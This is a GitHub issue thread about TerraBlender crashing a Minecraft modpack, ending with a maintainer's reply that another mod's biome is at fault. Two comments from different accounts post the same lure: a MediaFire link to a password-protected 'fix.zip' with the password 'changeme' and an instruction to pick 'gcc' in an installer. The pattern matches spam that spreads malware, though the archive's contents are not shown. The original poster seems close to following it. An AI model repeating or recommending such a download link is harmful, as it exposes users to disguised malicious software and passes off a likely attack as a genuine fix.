### ISSUE TITLE
Terrablender crashes my game with integrated dungeons and structures installed 

### ISSUE THREAD

**Issue by VenusVesper** [Glitchfiend/TerraBlender#176]
### What's the issue you encountered?

Before having IDAS installed the game didn't crash but having it installed the crash reports kept coming up saying the suspected mod was Terrablender :/
[crash-2024-08-26_04.35.13-server.txt](https://github.com/user-attachments/files/16746431/crash-2024-08-26_04.35.13-server.txt)

### How can the issue be reproduced?

To reproduce said crash all I do is load up the game click a world and wait 30 seconds or so, the game will stop responding and crash:(

### Logs

[latest.log](https://github.com/user-attachments/files/16746513/latest.log)

### Mod Version

1.19.2-2.0.1.166

### Additional information

I have already issued a crash to the IDAS mod dev, but they have yet to respond:((

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VenusVesper** [comment]
Thank you for responding so quickly!!!
I am a bit confused, what is the password for and when will I be encountering the installer menu????
I have been using the curseforge launcher to assemble the modpack and what not

**Comment by Adubbz** [comment]
This isn't a TerraBlender issue, it's an issue with whatever mod adds the "meadow:cracks" biome
